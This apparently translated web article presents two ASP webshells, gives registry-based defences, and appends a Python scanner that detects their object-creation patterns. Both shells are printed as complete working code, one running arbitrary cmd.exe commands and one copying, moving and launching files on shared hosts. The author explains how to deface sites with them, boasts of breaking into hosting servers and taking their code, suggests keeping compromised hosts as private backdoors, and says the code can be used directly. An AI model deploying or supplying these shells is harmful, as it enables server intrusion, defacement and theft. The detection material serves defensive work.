Two typical ASP Trojans and how to guard against them

Source: Internet
Author: User

With the spread of ASP technology, more and more Web sites are built on ASP, and ASP support can be considered a basic function of IIS on Windows. But backdoor trojans written in ASP are also becoming more common and more powerful. Because ASP is a scripting service provided by the server itself, an ASP script trojan is not caught by anti-virus software, which is why hackers call it "the backdoor that can never be killed". Its concealment and resistance to removal make it a serious threat to site security, so preventing and removing ASP trojans places higher technical demands on administrators. Below, drawing on personal experience, I discuss two fairly typical ASP trojans and how to guard against them; I hope it is of help to everyone.

The following is the code for the first Trojan:

<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' Create the COM objects that we will be using
Set oScript = Server.CreateObject("WScript.Shell")
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Check for a command that was posted to us
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    ' Use a poor man's pipe ... a temp file
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<HEAD><title>asp shell</title></HEAD>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="execute command">
</FORM>
<pre><%
If (IsObject(oFile)) Then
    ' Read the output from our command and remove the temp file
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%></pre>
</BODY>
</HTML>

Type dir in the command box and click "execute command" to list the directory. Any DOS command can be used this way, for example copy, net, netstat and so on.

By default, however, the commands run with only Guest-level rights, namely those of the anonymous IIS account IUSR_<computername>. Of course, if that account has been added to the Administrators group, the attacker has administrator privileges. The strength of this trojan is its convenience: it is almost like working at a DOS command prompt. But if the server has FSO (Scripting.FileSystemObject) disabled and the attacker cannot upload a component of his own, it cannot be used at all. It also cannot be used on virtual hosts added to the server later, only on the default Web site, so its scope is fairly narrow.

To see how to guard against it, look at its code:

Set oScript = Server.CreateObject("WScript.Shell")
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

The first line creates a WScript.Shell object named oScript; that is the object which executes commands. Together, these three lines create the WScript.Shell, WScript.Network and Scripting.FileSystemObject objects. To control WScript.Shell we simply rename or delete its keys in the registry, as shown in the figure (the ProgID keys under HKEY_CLASSES_ROOT). Note that both the "WScript.Shell" key and the "WScript.Shell.1" key must be renamed or deleted, because "WScript.Shell.1" is the version-specific ProgID of the same component: if only "WScript.Shell" is changed, the hacker simply edits the code to Set oScript = Server.CreateObject("WScript.Shell.1") and the backdoor runs again.

As you may have guessed, the new names given to "WScript.Shell" and "WScript.Shell.1" must not be easy to guess. If, for example, you rename "WScript.Shell" to "WScript.Shell888", the hacker just changes the code to Set oScript = Server.CreateObject("WScript.Shell888") and the trojan runs again. Also, the registry change only takes effect after the Web service has been restarted. One further caveat: renaming the ProgID keys leaves the component's CLSID registration in place, so a page that creates the object by CLSID (for example with an <object runat="server" classid="clsid:..."> tag) is not blocked by the rename. Denying the IUSR account read access to the component's CLSID key, or unregistering the component outright (WScript.Shell and WScript.Network both live in wshom.ocx, which regsvr32 /u can unregister), closes that gap as well.

Next, let's look at the code of the second ASP backdoor trojan:

<%@ Language=VBScript %>
<% Response.Write "<font size=6 color=red>Only one operation can be performed at a time</font>" %>
<%= Now() %> Physical path of this program:<br>
<%= Request.ServerVariables("APPL_PHYSICAL_PATH") %>
<title>asp Shell.Application backdoor</title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%= szCMD %>"> Enter the directory to browse<br>
<input type=text name=text1 value="<%= szCMD1 %>"> Copy to <input type=text name=text2 value="<%= szCMD2 %>"><br>
<input type=text name=text3 value="<%= szCMD3 %>"> Move to <input type=text name=text4 value="<%= szCMD4 %>"><br>
Path: <input type=text name=text5 value="<%= szCMD5 %>"> Program: <input type=text name=text6 value="<%= szCMD6 %>"><br>
<input type=submit name=sb value="Send command">
</form>
</body>
<%
' Directory browsing
szCMD = Request.Form("text")
If (szCMD <> "") Then
    Set Shell = Server.CreateObject("Shell.Application")   ' create the Shell object
    Set Fod1 = Shell.NameSpace(szCMD)
    Set FodItems = Fod1.Items
    For Each Co In FodItems
        Response.Write "<font color=red>" & Co.Path & "-----" & Co.Size & "</font><br>"
    Next
End If
%>
<%
' Directory copy (file copy is not supported)
szCMD1 = Request.Form("text1")   ' source
szCMD2 = Request.Form("text2")   ' destination folder
If szCMD1 <> "" And szCMD2 <> "" Then
    Set Shell1 = Server.CreateObject("Shell.Application")   ' create the Shell object
    Set Fod1 = Shell1.NameSpace(szCMD2)
    ' Split the source into parent path and leaf name at the last backslash
    For i = Len(szCMD1) To 1 Step -1
        If Mid(szCMD1, i, 1) = "\" Then
            Path = Left(szCMD1, i - 1)
            Exit For
        End If
    Next
    If Len(Path) = 2 Then Path = Path & "\"   ' a bare drive letter such as C: needs its trailing backslash
    Path2 = Right(szCMD1, Len(szCMD1) - i)
    Set Fod2 = Shell1.NameSpace(Path)
    Set FodItem = Fod2.ParseName(Path2)
    Fod1.CopyHere FodItem
    Response.Write "Command completed successfully!"
End If
%>
<%
' Directory move
szCMD3 = Request.Form("text3")   ' source
szCMD4 = Request.Form("text4")   ' destination folder
If szCMD3 <> "" And szCMD4 <> "" Then
    Set Shell2 = Server.CreateObject("Shell.Application")   ' create the Shell object
    Set Fod1 = Shell2.NameSpace(szCMD4)
    For i = Len(szCMD3) To 1 Step -1
        If Mid(szCMD3, i, 1) = "\" Then
            Path = Left(szCMD3, i - 1)
            Exit For
        End If
    Next
    If Len(Path) = 2 Then Path = Path & "\"
    Path2 = Right(szCMD3, Len(szCMD3) - i)
    Set Fod2 = Shell2.NameSpace(Path)
    Set FodItem = Fod2.ParseName(Path2)
    Fod1.MoveHere FodItem
    Response.Write "Command completed successfully!"
End If
%>
<%
' Execute a program in the given path
szCMD5 = Request.Form("text5")   ' folder
szCMD6 = Request.Form("text6")   ' program name within that folder
If szCMD5 <> "" And szCMD6 <> "" Then
    Set Shell3 = Server.CreateObject("Shell.Application")   ' create the Shell object
    Shell3.NameSpace(szCMD5).Items.Item(szCMD6).InvokeVerb
    Response.Write "Command completed successfully!"
End If
%>

To list a directory, just type the directory path in the browse box and click "Send command". This trojan can copy and move files and run programs, but many commands cannot be used, such as del, net and netstat. Its functions are simple, but they are enough to deface a Web site: for example, move the site's home page somewhere else, then copy in a hacker page with the same name, and you are done.

The fatal thing is that this trojan works on any virtual host: as a mere user of one virtual space on the server, I can upload it and use it to modify any other user's home page. So for a hosting provider that sells virtual space and has not patched this, it is a dead end.

However, in my practice I found that many of China's virtual-space providers, especially some small ones, have not patched. I took advantage of this vulnerability to gain admin access to many virtual-space servers, and then kindly helped them fix the hole. Of course I got what I wanted: lots of good software and code. Many of the ASP programs I use now were stolen from their servers; "stolen" is too harsh, I should say "downloaded".

So how do we guard against this ASP backdoor? Look at the line Set Shell = Server.CreateObject("Shell.Application"). As with the previous method, we simply rename or delete the "Shell.Application" and "Shell.Application.1" keys. Remember, if you rename them, make the new name complicated enough that hackers cannot guess it. By the way, if you patch a "chicken" (a compromised host you control), it is best to rename the key and write the new name down, so it becomes your private back door. Finally, a summary of the two ASP backdoors and how to prevent them: the first trojan is powerful but narrow in scope, because it needs FSO, that is, the "Scripting.FileSystemObject" component, to be available. The second trojan has fewer functions, but since it only creates a "Shell.Application" object it works on any virtual host. (This one really is very dangerous; administrators of servers that host ASP space, take note!)

In fact, from the two cases above you may already have drawn the general lesson: to guard against ASP backdoors, just rename or delete in the registry "Shell.Application", "WScript.Shell" and the other dangerous script objects (they are what give the script its command channel). Once the system is prevented from creating a "script shell", the ASP trojan has nothing to build on, like making bricks without straw, and cannot run.
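As an added example (editor's code, not part of the original article), here is a small Python scanner for the object-creation patterns both trojans above rely on, and for the bypasses discussed under the registry-rename defence. It normalises the CreateObject argument so that case, whitespace, the versioned "WScript.Shell.1" ProgID and the "WScr" & "ipt.Shell" concatenation trick all fold to the same name; it flags any ProgID that is neither known-dangerous nor on an assumed per-site allowlist, which is what catches a renamed-but-guessed key such as WScript.Shell888; and it separately reports <object runat=server classid=...> tags, which create the component by CLSID and are unaffected by a ProgID rename. The ASP sample it runs over is constructed for the example, and the allowlist and the all-zero CLSID are placeholders to adjust for a real site.

```python
"""Static scan of ASP source for the object-creation patterns used by ASP webshells."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# ProgIDs instantiated by the two trojans in the article (plus WScript.Network,
# which the first one also creates). Compared after normalisation, see below.
DANGEROUS_PROGIDS = {
    "wscript.shell",
    "wscript.network",
    "scripting.filesystemobject",
    "shell.application",
}

# Assumed per-site allowlist of ProgIDs a normal ASP application uses (placeholder).
# Anything not here and not known-dangerous is reported as "unknown-progid";
# that is what catches a renamed key the attacker has guessed (WScript.Shell888).
ALLOWED_PROGIDS = {
    "adodb.connection",
    "adodb.recordset",
    "adodb.stream",
}

# Server.CreateObject(...) or bare CreateObject(...), any case, any spacing.
_CREATEOBJECT = re.compile(r"createobject\s*\(\s*(?P<arg>[^)]*)\)", re.IGNORECASE)
# VBScript string literals inside the argument ("WScr" & "ipt.Shell" is two of them).
_STRING_LITERAL = re.compile(r'"([^"]*)"')
# <object runat=server ... classid="clsid:..."> creates the component by CLSID,
# so renaming the ProgID keys in the registry does not stop it.
_OBJECT_TAG = re.compile(
    r"<object\b(?=[^>]*\brunat\s*=\s*[\"']?server\b)[^>]*\bclassid\s*=\s*[\"']?clsid:"
    r"(?P<clsid>[0-9a-f-]{36})",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str    # dangerous-progid | unknown-progid | dynamic-progid | clsid-object-tag
    detail: str


def normalise_progid(arg: str) -> Optional[str]:
    """Fold a CreateObject argument into a canonical ProgID, or None if it is not static.

    Joins adjacent string literals (the & concatenation trick), strips spaces
    and case, and drops a version suffix so "WScript.Shell.1" == "WScript.Shell".
    """
    literals = _STRING_LITERAL.findall(arg)
    residue = _STRING_LITERAL.sub("", arg).replace("&", "").strip()
    if not literals or residue:
        return None        # a variable, a Request.Form(...) call, etc.
    progid = "".join(literals).replace(" ", "").lower()
    return re.sub(r"\.\d+$", "", progid)


def scan_asp(source: str) -> List[Finding]:
    """Return one Finding per suspicious object creation, in source order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in _CREATEOBJECT.finditer(line):
            progid = normalise_progid(m.group("arg"))
            if progid is None:
                findings.append(Finding(lineno, "dynamic-progid", m.group("arg").strip()))
            elif progid in DANGEROUS_PROGIDS:
                findings.append(Finding(lineno, "dangerous-progid", progid))
            elif progid not in ALLOWED_PROGIDS:
                findings.append(Finding(lineno, "unknown-progid", progid))
        for m in _OBJECT_TAG.finditer(line):
            findings.append(Finding(lineno, "clsid-object-tag", m.group("clsid").lower()))
    return findings


def summarise(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per kind, e.g. for a per-file report."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


# Constructed sample: the variants an attacker would try against a ProgID rename.
SAMPLE_ASP = """\
<%@ Language=VBScript %>
<%
Set oScript = Server.CreateObject ("WSCRIPT. SHELL ")
Set oScriptNet = Server.CreateObject("WScript.Shell.1")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Set Shell = Server.CreateObject("Shell.Application")
Set Hidden = CreateObject("WScr" & "ipt.Shell")
Set Renamed = Server.CreateObject("WScript.Shell888")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Dyn = Server.CreateObject(Request.Form("p"))
%>
<object runat="server" id="o" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
"""

if __name__ == "__main__":
    for f in scan_asp(SAMPLE_ASP):
        print(f"line {f.line:2d}  {f.kind:18s} {f.detail}")
```

Run it as a script to see the findings for the constructed sample; to audit a site, read each .asp file under the Web root and pass its text to scan_asp. The "unknown-progid" class is deliberately noisy: the point of an allowlist is that a renamed WScript.Shell key still has to appear in the script under whatever name the attacker guessed, and a blocklist alone can never know that name.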

Note: copy the code above into a file saved with the .asp extension and it can be used directly.


